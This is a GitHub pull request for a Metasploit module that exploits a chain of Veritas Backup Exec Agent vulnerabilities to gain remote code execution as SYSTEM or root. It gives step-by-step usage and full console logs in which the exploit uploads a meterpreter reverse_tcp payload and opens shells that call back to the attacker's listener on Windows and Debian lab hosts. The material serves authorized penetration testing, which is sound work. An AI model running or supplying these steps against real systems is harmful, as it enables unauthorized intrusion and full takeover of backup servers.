
Veritas Backup Exec Agent Authentication Bypass RCE #17012

Merged: 10 commits, Sep 23, 2022

Conversation

c0rs

@c0rs c0rs commented Sep 13, 2022

Add Veritas Backup Exec Agent Remote Code Execution exploit.

The module allows exploitation of a chain of the vulnerabilities CVE-2021-27876,
CVE-2021-27877 and CVE-2021-27878 in Veritas Backup Exec Agent (up to
version 21.2 or agent revision 9.4), which leads to remote code execution with
the privileges of the system user (`NT AUTHORITY\SYSTEM` or `root`) by default.

This module has been tested successfully on Windows 7 Ultimate (6.1.7601
Service Pack 1 Build 7601) and Debian 9 (x86_64) with kernel version
4.9.0-13-amd64.

Veritas Security Bulletin: https://www.veritas.com/content/support/en_US/security/VTS21-001

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/multi/veritas/beagent_sha_auth_rce
  • set RHOSTS <TARGET_IP>
  • set TARGET <OS_NAME>
  • set PAYLOAD <PAYLOAD_NAME>
  • exploit
  • Verify you get an NT AUTHORITY\SYSTEM or root session

Scenarios

msf6 > use exploit/multi/veritas/beagent_sha_auth_rce
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set RHOSTS 172.16.180.141
RHOSTS => 172.16.180.141
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > check

[*] 172.16.180.141:10000 - Checking vulnerability
[*] 172.16.180.141:10000 - Connecting to BE Agent service
[*] 172.16.180.141:10000 - Getting supported authentication types
Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
BE agent revision: 9.3
[*] 172.16.180.141:10000 - The target appears to be vulnerable. SHA authentication is enabled
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set TARGET Windows
TARGET => Windows
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set LHOST 172.16.180.248
LHOST => 172.16.180.248
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > show options 

Module options (exploit/multi/veritas/beagent_sha_auth_rce):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   172.16.180.141   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    10000            yes       The target port (TCP)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.180.248   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run

[*] Started reverse TCP handler on 172.16.180.248:4444 
[*] 172.16.180.141:10000 - Exploiting ...
[*] 172.16.180.141:10000 - Connecting to BE Agent service
[*] 172.16.180.141:10000 - Enabling TLS for NDMP connection
[*] 172.16.180.141:10000 - Passing SHA authentication
[*] 172.16.180.141:10000 - Uploading payload with NDMP_FILE_WRITE packet
[*] Sending stage (175686 bytes) to 172.16.180.141
[*] Meterpreter session 2 opened (172.16.180.248:4444 -> 172.16.180.141:49630) at 2022-09-12 01:44:44 +0300

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

@jheysel-r7 jheysel-r7 left a comment


@c0rs, thanks for the awesome contribution. I tested on Windows and Linux installs and they both worked without any issues 👍 Just a couple of small suggestions. If you do accept some of the suggestions you'll have to update the console output in the Scenarios section of the documentation. Other than that I think this is good to ship.

Windows:

msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 192.168.123.147
rhosts => 192.168.123.147
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] 192.168.123.147:10000 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.123.147:10000 - Checking vulnerability
[*] 192.168.123.147:10000 - Connecting to BE Agent service
[*] 192.168.123.147:10000 - Getting supported authentication types
[*] 192.168.123.147:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
[*] 192.168.123.147:10000 - BE agent revision: 9.3
[+] 192.168.123.147:10000 - The target appears to be vulnerable. SHA authentication is enabled
[*] 192.168.123.147:10000 - Exploiting ...
[*] 192.168.123.147:10000 - Connecting to BE Agent service
[*] 192.168.123.147:10000 - Enabling TLS for NDMP connection
[*] 192.168.123.147:10000 - Passing SHA authentication
[*] 192.168.123.147:10000 - Uploading payload with NDMP_FILE_WRITE packet
[*] Sending stage (175686 bytes) to 192.168.123.147
[*] Meterpreter session 5 opened (192.168.123.1:4444 -> 192.168.123.147:49835) at 2022-09-22 15:23:19 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-BE1QFC9
OS              : Windows 10 (10.0 Build 19041).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.123.147 - Meterpreter session 5 closed.  Reason: User exit

Linux:

msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 172.16.199.133
rhosts => 172.16.199.133
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set target 1
target => 1
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > reload
[*] Reloading module...
run
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] 172.16.199.133:10000 - Running automatic check ("set AutoCheck false" to disable)
[*] 172.16.199.133:10000 - Checking vulnerability
[*] 172.16.199.133:10000 - Connecting to BE Agent service
[*] 172.16.199.133:10000 - Getting supported authentication types
[*] 172.16.199.133:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5)
[*] 172.16.199.133:10000 - BE agent revision: 9.3
[+] 172.16.199.133:10000 - The target appears to be vulnerable. SHA authentication is enabled
[*] 172.16.199.133:10000 - Exploiting ...
[*] 172.16.199.133:10000 - Connecting to BE Agent service
[*] 172.16.199.133:10000 - Enabling TLS for NDMP connection
[*] 172.16.199.133:10000 - Passing SHA authentication
[*] 172.16.199.133:10000 - Uploading payload with CmdStager
[*] 172.16.199.133:10000 - Command Stager progress -  44.15% done (362/820 bytes)
[*] Sending stage (3020772 bytes) to 172.16.199.133
[*] 172.16.199.133:10000 - Command Stager progress - 100.00% done (820/820 bytes)
[*] Meterpreter session 4 opened (172.16.199.1:4444 -> 172.16.199.133:55062) at 2022-09-22 15:17:01 -0400

meterpreter > getuid
Server username: root
meterpreter > sysinfop
[-] Unknown command: sysinfop
meterpreter > sysinfo
Computer     : debian.test.com
OS           : Debian 9.13 (Linux 4.9.0-19-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > Interrupt: use the 'exit' command to quit
meterpreter > exit
[*] Shutting down Meterpreter...

c0rs and others added 4 commits September 23, 2022 09:44
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
@jheysel-r7 jheysel-r7 merged commit 2b5e85c into rapid7:master Sep 23, 2022
@jheysel-r7 jheysel-r7 added the rn-modules release notes for new or majorly enhanced modules label Sep 23, 2022
@jheysel-r7

Release Notes

This module exploits a chain of the vulnerabilities CVE-2021-27876, CVE-2021-27877 and CVE-2021-27878 in Veritas Backup Exec Agent, which leads to remote code execution with the privileges of the system or root user.

@c0rs c0rs deleted the veritas-be-auth branch September 23, 2022 19:10
Labels: docs, module, rn-modules (release notes for new or majorly enhanced modules)